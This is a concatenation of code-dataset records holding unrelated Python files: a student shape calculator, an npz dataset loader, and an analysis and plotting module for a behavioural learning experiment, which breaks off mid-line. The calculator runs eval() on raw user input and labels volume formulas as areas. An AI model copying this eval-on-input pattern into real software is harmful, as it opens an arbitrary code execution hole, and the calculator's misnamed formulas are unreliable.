run_tflite_inference_testSet(FLOAT_MODEL_TFLITE)\n run_tflite_inference_testSet(MODEL_TFLITE, model_type='Quantized')\n","repo_name":"gameldar/pump-power-levels-tinyml","sub_path":"python/keyword-spotting.py","file_name":"keyword-spotting.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5229411305","text":"#\n# Example program for Targil 1\n#\nimport math\n\n\ndef isNumber(valStr):\n \"\"\"\n a function to check if a string is a number\n :param valStr: the string to check\n :return: true if it a number and false if it didn't\n \"\"\"\n if valStr.count('.') > 1:\n return False\n L = [c for c in valStr if (c.isdigit() or c == '.')]\n return len(L) == len(valStr)\n\n\n#\n\ndef getNumber(prompt):\n \"\"\"\n a function to check validation to a number\n :param prompt: the parameter\n :return: the parameter if it a number\n \"\"\"\n while True:\n val = input(prompt)\n if not isNumber(val):\n print(\"it must be a number!\")\n else:\n return eval(val)\n\n\ndef rectangleArea(w, h):\n \"\"\"\n Area calculation program rectangle\n :param w: width\n :param h: height\n :return: the area\n \"\"\"\n return w * h\n\n\n#\ndef circleArea(r):\n \"\"\"\n Area calculation program circle\n :param r: radius\n :return: the area\n \"\"\"\n return math.pi * r ** 2\n\n\n#\ndef sphereArea(r):\n \"\"\"\n Area calculation program sphere\n :param r: radius\n :return: the area\n \"\"\"\n val = math.pi * (4 / 3)\n return val * r ** 3\n\n\n#\ndef coneArea(h, r):\n \"\"\"\n Area calculation program cone\n :param h: height\n :param r: radius\n :return: the area\n \"\"\"\n return h * (1 / 3) * math.pi * r ** 2\n\n\n#\ndef squarePyramidArea(a, h):\n \"\"\"\n Area calculation program square pyramid\n :param a: the base\n :param h: height\n :return: the area\n \"\"\"\n s = rectangleArea(a, a)\n return s * h * (1 / 3)\n\n\n# printing the menu options\ndef prtMenu(shapes):\n for i in range(len(shapes)):\n print(i + 1, shapes[i])\n return\n\n\n#\n# main program\n#\ndef main():\n print(\"Welcome to the Area calculation program\")\n print(\"---------------------------------------\\n\")\n # Print out the menu\n shapes = (\"Rectangle\", \"Circle\", \"Sphere\", \"Cone\", \"Square pyramid\")\n while True:\n print(\"\\nPlease select a shape (press 0 to quit):\")\n prtMenu(shapes)\n # Get the user's choice:\n shape = input(\"> \")\n # Calculate the area:\n if shape == \"1\":\n height = eval(input(\"Please enter the height: \"))\n width = eval(input(\"Please enter the width: \"))\n area = rectangleArea(width, height)\n print(\"The area is\", area)\n continue\n elif shape == \"2\":\n radius = eval(input(\"Please enter the radius: \"))\n area = circleArea(radius)\n print(\"The area is\", area)\n continue\n elif shape == \"3\":\n radius = eval(input(\"Please enter the radius: \"))\n area = sphereArea(radius)\n print(\"The area is\", area)\n continue\n elif shape == \"4\":\n radius = eval(input(\"Please enter the radius: \"))\n height = eval(input(\"Please enter the height: \"))\n area = coneArea(height, radius)\n print(\"The area is\", area)\n continue\n elif shape == \"5\":\n width = eval(input(\"Please enter the width: \"))\n height = eval(input(\"Please enter the height: \"))\n area = squarePyramidArea(width, height)\n print(\"The area is\", area)\n continue\n elif shape == \"0\":\n print(\"Bye!\")\n break\n else:\n print(\"Invalid shape\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maorsarusi/python_pycharm","sub_path":"functional_programming/ex1/targil1_2.py","file_name":"targil1_2.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43166354779","text":"import os, glob\nimport numpy as np\nimport tensorflow as tf\n\nfrom sklearn.utils import shuffle\n\nclass Dataset(object):\n\n def __init__(self, datapath='dataset_npz'):\n\n print(\"\\nInitializing Dataset...\")\n\n self.list_npz = self.sorted_list(os.path.join(datapath, '*.npz'))\n self.list_npz = shuffle(self.list_npz)\n\n bound = int(len(self.list_npz) * 0.8)\n self.list_tr, self.list_te = self.list_npz[:bound], self.list_npz[bound:]\n self.num_tr, self.num_te = len(self.list_tr), len(self.list_te)\n\n print(\"\\nDataset\")\n print(\" Training : %5d\" %(self.num_tr))\n print(\" Test : %5d\" %(self.num_te))\n\n self.reset_idx()\n x, _, _ = self.next_batch(batch_size=1, train=True)\n self.reset_idx()\n\n self.seq_len, self.seq_dim = x.shape[1], x.shape[2]\n print(\"\\nSequence\")\n print(\" Length : %3d\" %(self.seq_len))\n print(\" Dimension : %3d\" %(self.seq_dim))\n\n def sorted_list(self, path):\n\n tmplist = glob.glob(path)\n tmplist.sort()\n\n return tmplist\n\n def reset_idx(self):\n\n self.list_tr = shuffle(self.list_tr)\n self.idx_tr, self.idx_te = 0, 0\n\n def load_npz(self, path):\n\n return np.load(path)\n\n def next_batch(self, batch_size=1, train=False):\n\n if(train): idx_d, num_d, list_d = self.idx_tr, self.num_tr, self.list_tr\n else: idx_d, num_d, list_d = self.idx_te, self.num_te, self.list_te\n\n batch_x, batch_y, terminate = [], [], False\n while(True):\n try:\n npz = self.load_npz(path=list_d[idx_d])\n except:\n if(train): self.list_tr = shuffle(self.list_tr)\n idx_d, terminate = 0, True\n break\n else:\n batch_x.append(np.asarray([npz['coord_x'], npz['coord_y']]).T)\n batch_y.append(npz['label'])\n idx_d += 1\n if(len(batch_x) >= batch_size): break\n\n if(train): self.idx_tr = idx_d\n else: self.idx_te = idx_d\n\n return np.asarray(batch_x), batch_y, terminate\n","repo_name":"YeongHyeon/Sequence-Autoencoder","sub_path":"source/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"20788734267","text":"import numpy as np\nimport pandas\nfrom pandas import DataFrame, concat, read_csv\nfrom statsmodels.stats.anova import AnovaRM\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.special import comb\nfrom scipy.stats import binom\nfrom scipy.stats import ttest_rel\n\nfrom taskSetting import *\nfrom expsInfo import *\n\n\ndef plot_learning_curves(ax, varName, learning_curves, wIndividualCurves, plotColor, reference_curves, reference_legend, reference_color, game_length, numRelevantDimension, fontsize=16, linewidth=5):\n\n trial_index = np.arange(game_length)+1\n \n # individual learning curves\n if wIndividualCurves:\n for learning_curve in learning_curves:\n ax.plot(trial_index, learning_curve, alpha=0.2, color=plotColor, label='_nolegend_')\n\n # average (and sem) learning curves\n if all([len(curve) == 0 for curve in learning_curves]):\n return None, None\n elif np.isscalar(learning_curves[0]):\n varPlot = ax.plot(trial_index, learning_curves, color=plotColor, lw=linewidth)[0]\n else:\n average_values = np.squeeze(np.nanmean(np.stack(learning_curves, axis=1),axis=1))\n sem_values = np.squeeze(np.nanstd(np.stack(learning_curves, axis=1),axis=1)/np.sqrt(np.stack(learning_curves, axis=1).shape[1]))\n varPlot = ax.plot(trial_index, average_values, color=plotColor, lw=linewidth)[0]\n ax.fill_between(trial_index, average_values - sem_values, average_values + sem_values, lw=0, alpha=0.3, color=plotColor)\n \n # reference curves (mean and sem)\n if reference_curves is None:\n refPlot = None\n elif np.isscalar(reference_curves):\n refPlot = ax.plot(trial_index, [reference_curves]*game_length, color=reference_color, ls='--')[0] #, lw=linewidth\n elif np.isscalar(reference_curves[0]):\n refPlot = ax.plot(trial_index, reference_curves, color=reference_color, ls='--')[0] #, lw=linewidth\n else:\n average_reference = np.squeeze(np.nanmean(np.stack(reference_curves, axis=1),axis=1))\n sem_reference = np.squeeze(np.nanstd(np.stack(reference_curves, axis=1),axis=1)/np.sqrt(np.stack(reference_curves, axis=1).shape[1]))\n refPlot = ax.plot(trial_index, average_reference, color=reference_color, ls='--')[0] #, lw=linewidth\n ax.fill_between(trial_index, average_reference - sem_reference, average_reference + sem_reference, lw=0, alpha=0.3, color=reference_color)\n \n # ax settings\n ylimValues = {\n 'NumSelected': [0, 3],\n 'ExpectedReward': [0.35, 0.85],\n 'numDimensionsChange': [0, 3],\n 'numDimensionsChangeCondChoiceChange': [0, 3],\n 'typeChoiceChange': [0, 0.5],\n 'typeFeaturesLearningCurve': [0, 2],\n }\n ax.set_ylim(ylimValues[varName][0],ylimValues[varName][1])\n ax.tick_params(axis='both', labelsize=fontsize, pad=10)\n \n return varPlot, refPlot\n\n\ndef get_chance_curve(empiricalChance, current_df, varName, numRelevantDimension, game_length, ifdata = True):\n \n if varName in ['NumSelected', 'numDimensionsChange', 'numDimensionsChangeCondChoiceChange']:\n return [np.nan]*game_length\n \n elif varName in ['ExpectedReward']:\n return [0.4] * game_length\n\n\ndef get_learning_curve(current_df, varName, numRelevantDimension, ifdata = True):\n\n if varName in ['ExpectedReward']:\n current_df['add_numFeatureSelected'] = concat([(~current_df['selectedFeature_'+dim].isnull()).astype(int) for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_numRewardingFeaturesSelected'] = concat([(~current_df['rewardingFeature_'+dim].isnull() & \\\n (current_df['selectedFeature_'+dim] == current_df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_expectedNumRewardingFeaturesBuilt'] = current_df['add_numRewardingFeaturesSelected'] + concat([(~current_df['rewardingFeature_'+dim].isnull() & \\\n current_df['selectedFeature_'+dim].isnull()).astype(int) for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)/3\n tmp_df = current_df.reset_index(drop=True)\n tmp_df['numRelevantDimensionsUnselected'] = concat([(~tmp_df['rewardingFeature_'+dim].isnull() & tmp_df['selectedFeature_'+dim].isnull()).astype(int) for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_expectedReward'] = [np.sum([binom.pmf(k=i, n=tmp_df.loc[iRow, 'numRelevantDimensionsUnselected'], p=1/3) *\n rewardSetting[int(tmp_df.loc[iRow, 'numRelevantDimensions']-1)][int(tmp_df.loc[iRow, 'add_numRewardingFeaturesSelected']) + i]\n for i in range(int(tmp_df.loc[iRow, 'numRelevantDimensionsUnselected']+1))]) for iRow in range(tmp_df.shape[0])]\n\n elif varName == 'numDimensionsChange':\n tmp_df = current_df[~current_df['rt'].isnull()].copy().reset_index(drop=True)\n numDimensionsChange = 3.0 - np.sum([(tmp_df['selectedFeature_' + dim].iloc[1:].values == tmp_df['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0)\n numDimensionsChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n\n elif varName == 'numDimensionsChangeCondChoiceChange':\n tmp_df = current_df[~current_df['rt'].isnull()].copy().reset_index(drop=True)\n choiceChange = (np.sum([(tmp_df['selectedFeature_' + dim].iloc[1:].values == tmp_df['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0) < 3).astype(np.float)\n choiceChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_choiceChange'] = np.concatenate((np.nan, choiceChange), axis=None)\n current_df.loc[current_df['rt'].isnull(), 'add_choiceChange'] = np.nan\n numDimensionsChange = 3.0 - np.sum([tmp_df['selectedFeature_' + dim].iloc[1:].values ==\n tmp_df['selectedFeature_' + dim].iloc[:-1].values for dim in DIMENSIONS],axis=0)\n numDimensionsChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n current_df.loc[current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.nan\n current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == True), 'add_numDimensionsChangeCondChoiceChange'] = current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == True), 'add_numDimensionsChange']\n current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == False), 'add_numDimensionsChangeCondChoiceChange'] = np.nan\n\n returnVarName = {\n 'NumSelected': 'numSelectedFeatures',\n 'ExpectedReward': 'add_expectedReward',\n 'numDimensionsChange': 'add_numDimensionsChange',\n 'numDimensionsChangeCondChoiceChange': 'add_numDimensionsChangeCondChoiceChange'\n }\n if ifdata:\n current_df.loc[current_df['rt'].isnull(),returnVarName[varName]] = np.nan\n return current_df.groupby('trial').agg({returnVarName[varName]:np.nanmean})[returnVarName[varName]].values, current_df[returnVarName[varName]]\n\n\ndef selectedFeatureTypeCounts(df, period):\n # selecting correct rewarding feature\n df['add_numRewardingFeatureSelected'] = concat([(~df['rewardingFeature_'+dim].isnull() & \\\n (df['selectedFeature_'+dim] == df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n # selecting wrong feature on the relevant dimension\n df['add_numWrongFeatureSelected'] = concat([(~df['rewardingFeature_'+dim].isnull() & \\\n ~df['selectedFeature_'+dim].isnull() & \\\n (df['selectedFeature_'+dim] != df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n # selecting a feature on the irrelevant dimension\n df['add_numIrrelevantFeatureSelected'] = concat([(df['rewardingFeature_'+dim].isnull() & \\\n ~df['selectedFeature_'+dim].isnull() ).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n if period == 'gameEnd':\n return [df.mean()[col].values for col in ['add_numRewardingFeatureSelected','add_numWrongFeatureSelected','add_numIrrelevantFeatureSelected']]\n else: # 'learning curve'\n return [df.groupby('trial').agg({col:np.nanmean})[col].values for col in\n ['add_numRewardingFeatureSelected','add_numWrongFeatureSelected','add_numIrrelevantFeatureSelected']]\n\n\ndef choiceChangeTypeCounts(df):\n # exclude no-response trials\n data_valid = df[~df['rt'].isnull()].copy()\n data_valid = data_valid.reset_index(drop=True)\n\n # find change points of choices\n choiceChange = (np.sum(\n [(data_valid['selectedFeature_' + dim].iloc[1:].values == data_valid['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(data_valid['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(\n data_valid['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0) < 3).astype(np.float)\n choiceChange[data_valid['trial'].iloc[1:].values - data_valid['trial'].iloc[\n :-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n data_valid.loc[:, 'add_choiceChange'] = np.concatenate((np.nan, choiceChange), axis=None)\n\n # count the number of features changed in each choice\n numDimensionsChange = 3.0 - np.sum(\n [(data_valid['selectedFeature_' + dim].iloc[1:].values == data_valid['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(data_valid['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(\n data_valid['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0)\n data_valid.loc[:, 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n\n # label the type of choice change\n # if there is no choice change, mark as nan\n for dim in DIMENSIONS:\n data_valid.loc[:, 'add_choiceChangeType_' + dim] = np.nan\n data_valid.loc[:, 'add_choiceChangeType_overall'] = np.nan\n data_valid.loc[:, 'add_choiceChangeTypeCount'] = np.nan\n data_valid.loc[:, 'add_choiceChangeTypeList'] = np.nan\n data_valid['add_choiceChangeTypeList'] = data_valid['add_choiceChangeTypeList'].astype(object)\n\n for irow in np.where(data_valid['add_choiceChange'] == True)[0]:\n choiceChangeTypeList = []\n for dim in DIMENSIONS:\n if (data_valid.loc[irow - 1, 'selectedFeature_' + dim] == data_valid.loc[\n irow, 'selectedFeature_' + dim]) | (\n (pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim]))):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = np.nan\n elif (pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n ~pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim])):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'add'\n choiceChangeTypeList.append('add')\n elif (~pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim])):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'drop'\n choiceChangeTypeList.append('drop')\n elif data_valid.loc[irow - 1, 'selectedFeature_' + dim] != data_valid.loc[irow, 'selectedFeature_' + dim]:\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'switch_within'\n choiceChangeTypeList.append('switch_within')\n data_valid.loc[irow, 'add_choiceChangeTypeCount'] = len(choiceChangeTypeList)\n\n if len(set(choiceChangeTypeList)) == 1: # only one type of changes\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = choiceChangeTypeList[0]\n elif (data_valid.loc[irow, 'add_choiceChangeTypeCount'] == 2) & np.isin('add', choiceChangeTypeList) & np.isin(\n 'drop', choiceChangeTypeList):\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = 'switch_across'\n else:\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = 'mixed'\n\n choiceChangeTypeList.sort()\n data_valid.at[irow, 'add_choiceChangeTypeList'] = '-'.join(choiceChangeTypeList)\n\n # assign the values to the original df\n df.loc[~df['rt'].isnull(), 'add_choiceChangeType_overall'] = data_valid['add_choiceChangeType_overall'].values\n df.loc[df['rt'].isnull(), 'add_choiceChangeType_overall'] = np.nan\n df.loc[~df['rt'].isnull(), 'add_choiceChangeTypeList'] = data_valid['add_choiceChangeTypeList'].values\n df.loc[df['rt'].isnull(), 'add_choiceChangeTypeList'] = np.nan\n\n typeChoiceChangeList = ['add', 'drop', 'switch_within', 'switch_across', 'mixed']\n for typeChoiceChange in typeChoiceChangeList:\n df.loc[~((df['rt'].isnull()) | (df['trial'] == 1)), 'add_choiceChangeType_overall_' + typeChoiceChange] \\\n = (df.loc[~((df['rt'].isnull()) | (df['trial'] == 1)), 'add_choiceChangeType_overall'] == typeChoiceChange).astype(float)\n df.loc[(df['rt'].isnull()) | (df['trial'] == 1), 'add_choiceChangeType_overall_' + typeChoiceChange] = np.nan\n\n return [df.groupby('trial').agg({col: np.nanmean})[col].values for col in\n ['add_choiceChangeType_overall_' + typesChoiceChange for typesChoiceChange in typeChoiceChangeList]]\n\n\ndef plotLearningCurves(varName, data, plotType='seperate', wIndividualCurves=False, empiricalChance=True, wLegend=True, showFigure=False, printcsv=False, runANOVA=False, expVersion=None, wTitleAxLabel=True, fontsize=20, xticklabels=[0, 10, 20, 30], ifPublish=True, plotChance=True, wTitle=False):\n\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n\n ## Get exp info\n # Get the list of participants and their worker IDs\n if 'workerId' in data.keys():\n workerIds = data['workerId'].unique()\n else: # simulated data\n workerIds = [0]\n data['workerId'] = 0\n\n # Get game variables\n gameLength = DataFrame.max(data['trial'])\n numGamePerType = int(DataFrame.max(data['game']) / 3 / 2)\n trialIndex = np.arange(gameLength)\n\n ## Plotting\n if varName in ['NumSelected', 'ExpectedReward', 'numDimensionsChange', 'numDimensionsChangeCondChoiceChange']:\n\n title = {\n 'NumSelected': '# features selected',\n 'ExpectedReward': 'Reward probability',\n 'numDimensionsChange': '# features changed (all trials)',\n 'numDimensionsChangeCondChoiceChange': '# features changed (choice change trials only)',\n }\n \n if ifPublish:\n fig, axes = plt.subplots(1, 3, sharex=True, figsize=(8, 2.5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(1, 3, sharex=True, figsize=(20, 12 / 3) if wLegend else (18, 12 / 3))\n linewidth = 5\n \n dfANOVAList_all = []\n for numRelevantDimensions in np.arange(3) + 1:\n\n if plotType == 'collapsed':\n if varName == 'pTrueHypo':\n Warning('Not supported')\n return\n # collapsed over informed and uninformed games\n learning_curves_collapsed = []\n chance_curves_collapsed = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['numRelevantDimensions'] == numRelevantDimensions)].copy()\n learning_curves_collapsed.append(get_learning_curve(current_df, varName, numRelevantDimensions))\n chance_curves_collapsed.append(\n get_chance_curve(empiricalChance, current_df, varName, numRelevantDimensions, gameLength))\n ax = axes[numRelevantDimensions - 1]\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves_collapsed, wIndividualCurves, 'purple',\n chance_curves_collapsed if plotChance else None, 'Chance', 'black', gameLength,\n numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n else:\n varPlots = []\n refPlots = []\n dfANOVAList = []\n # for informed and uninformed games separately\n for idx, informed in enumerate([True, False]):\n learning_curves = []\n chance_curves = []\n individualDataList = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[(data['workerId'] == workerId) & (data['numRelevantDimensions'] == numRelevantDimensions) & (\n data['informed'] == informed)].copy()\n if current_df.shape[0] > 0:\n learning_curve, individualData = get_learning_curve(current_df, varName, numRelevantDimensions)\n learning_curves.append(learning_curve)\n individualDataList.append(individualData)\n chance_curves.append(\n get_chance_curve(empiricalChance, current_df, varName, numRelevantDimensions, gameLength))\n ax = axes[numRelevantDimensions - 1]\n if varName not in ['NumSelected', 'ifChoiceChange', 'numDimensionsChange',\n 'numDimensionsChangeCondChoiceChange', 'pTrueHypo', 'Reward', 'Built', 'ExpectedBuilt', 'ExpectedReward']:\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves, wIndividualCurves, 'red' if informed else 'blue',\n chance_curves if plotChance else None, 'Chance', 'maroon' if informed else 'darkblue',\n gameLength, numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n else:\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves, wIndividualCurves,\n 'red' if informed else 'blue',\n chance_curves if plotChance else None, 'Chance', 'black',\n gameLength, numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n varPlots.append(varPlot)\n refPlots.append(refPlot)\n\n if runANOVA:\n df = DataFrame({'dv': flatten2Dlist(individualDataList), \n 'participant': flatten2Dlist([[workerId] * gameLength * numGamePerType for workerId in workerIds]),\n 'trial': flatten2Dlist([np.arange(gameLength) + 1] * len(workerIds) * numGamePerType),\n 'informed': [informed] * gameLength * len(workerIds) * numGamePerType,\n 'numRelevantDimensions': [numRelevantDimensions] * gameLength * len(workerIds) * numGamePerType\n })\n dfANOVAList.append(df)\n dfANOVAList_all.append(df)\n\n if runANOVA:\n # note that ANOVA is run on the mean of each participant (only one value, i.e. the average over observations, per participant per condition in fed into ANOVA)\n # with statsmodel.AnovaRM, you can either use the mean directly or provide individual data points and define aggregate_func as mean/np.nanmean\n dfANOVA = pandas.concat(dfANOVAList)\n aovrm = AnovaRM(data=dfANOVA, depvar='dv', subject='participant', within=['informed', 'trial'], aggregate_func=np.nanmean)\n result = aovrm.fit()\n print('Repeated measures ANOVA: ' + str(numRelevantDimensions) + 'D\\n', result)\n if printcsv:\n dfANOVA.to_csv('Rcode/' + varName + '_' + str(numRelevantDimensions) + 'D.csv')\n \n t, p = ttest_rel(dfANOVA[dfANOVA['informed']==True].groupby('participant').mean()['dv'], dfANOVA[dfANOVA['informed']==False].groupby('participant').mean()['dv'])\n print('Paired t-test: ' + str(numRelevantDimensions) + 'D')\n print('t = ' + str(round(t,2)) + '; p = ' + str(round(p,4)))\n\n sns.despine()\n \n if runANOVA:\n dfANOVA = pandas.concat(dfANOVAList_all)\n# aovrm = AnovaRM(data=dfANOVA, depvar='dv', subject='participant', within=['informed', 'numRelevantDimensions', 'trial'], aggregate_func=np.nanmean)\n# result = aovrm.fit()\n# print('Repeated measures ANOVA (three-way):', result)\n if printcsv:\n dfANOVA.to_csv('Rcode/' + varName + '.csv')\n \n if ifPublish:\n for ax in axes:\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if wTitleAxLabel:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n if not wTitle:\n axes[0].set_ylabel(title[varName], fontsize=fontsize)\n else:\n fig.suptitle(title[varName], fontsize=fontsize+0.5, y=0.9)\n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n \n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n # plt.tight_layout()\n # plt.show()\n else:\n for ax in axes:\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if wTitleAxLabel:\n fig.text(0.5, -0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 1, title[varName], ha='center', fontsize=fontsize)\n if wLegend:\n if plotType == 'collapsed':\n fig.legend(handles=[varPlot, refPlot], labels=['Participants', 'Chance'], loc=\"center right\", fontsize=fontsize,\n frameon=False)\n else:\n fig.legend(handles=[varPlots[0], varPlots[1], refPlots[0], refPlots[1]],\n labels=['Known', 'Unknown', 'Chance for known', 'Chance for unknown'], fontsize=fontsize,\n loc=\"center right\", frameon=False)\n plt.subplots_adjust(right=0.825, wspace=0.3)\n else:\n plt.subplots_adjust(wspace=0.3)\n\n elif varName == 'typeFeaturesLearningCurve':\n \n if ifPublish:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(8, 5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(20, 12 / 3) if wLegend else (18, 12 / 3))\n linewidth = 5\n\n for numRelevantDimension in np.arange(3) + 1:\n # for informed and uninformed games separately\n for idx, informed in enumerate([True, False]):\n rewarding_curves = []\n wrong_curves = []\n irrelevant_curves = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['informed'] == informed) & (\n data['numRelevantDimensions'] == numRelevantDimension)].copy()\n learning_curves = selectedFeatureTypeCounts(current_df, 'learningCurve')\n rewarding_curves.append(learning_curves[0])\n wrong_curves.append(learning_curves[1])\n irrelevant_curves.append(learning_curves[2])\n ax = axes[idx, numRelevantDimension - 1]\n p = [None] * 3\n p[0], _ = plot_learning_curves(ax, varName, rewarding_curves, wIndividualCurves, 'green', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n p[1], _ = plot_learning_curves(ax, varName, wrong_curves, wIndividualCurves, 'orange', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n p[2], _ = plot_learning_curves(ax, varName, irrelevant_curves, wIndividualCurves, 'gray', np.nan, '', None, gameLength,\n numRelevantDimension, fontsize=fontsize, linewidth=linewidth)\n \n if ifPublish:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.tick_params(axis='both', length=3.5, labelsize=fontsize, pad=4.5, width=axes_linewidth)\n ax.set_xlim([0, 30])\n xticklabels = [0, 15, 30]\n ax.set_xticks(xticklabels)\n ax.set_xticklabels(xticklabels)\n if not informed:\n ax.set_xlabel('Trial', labelpad=8, fontsize=fontsize)\n else:\n ax.set_title(f'{numRelevantDimension}D-relevant', fontsize=fontsize)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', labelpad=8, fontsize=fontsize)\n \n ax.spines['bottom'].set_linewidth(axes_linewidth)\n ax.spines['left'].set_linewidth(axes_linewidth)\n fig.suptitle('Feature selection type', fontsize=fontsize+0.5, y=0.9)\n plt.subplots_adjust(wspace=0.4, top=0.75, bottom=0.25)\n if wLegend:\n fig.legend(handles=p, labels=['Correct feature', 'Incorrect feature', 'False positive'], bbox_to_anchor=(1, 0.75), frameon=False)\n else:\n for numRelevantDimension in np.arange(3) + 1:\n for idx, informed in enumerate([True, False]):\n ax = axes[idx, numRelevantDimension - 1]\n ax.set_ylim(0, 3)\n if numRelevantDimension == 1:\n ax.set_ylabel('Known' if informed else 'Unknown', fontsize=fontsize)\n if idx == 0:\n ax.set_xlabel(str(numRelevantDimension) + 'D relevant', fontsize=fontsize)\n ax.xaxis.set_label_position('top')\n ax.tick_params(axis='both', labelsize=fontsize)\n if wTitleAxLabel:\n fig.text(0.5, 0.05, 'Trial', ha='center', fontsize=fontsize)\n fig.text(0.5, 0.95, '# features selected per type', ha='center', fontsize=fontsize)\n if wLegend:\n fig.legend(handles=p, labels=['Correct feature', 'Incorrect feature', 'False positive'], loc=\"center right\")\n \n elif varName == 'typeChoiceChange':\n\n if ifPublish:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(8, 5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(2, 3, sharex=True, figsize=(20, 12 / 3) if wLegend else (18, 12 / 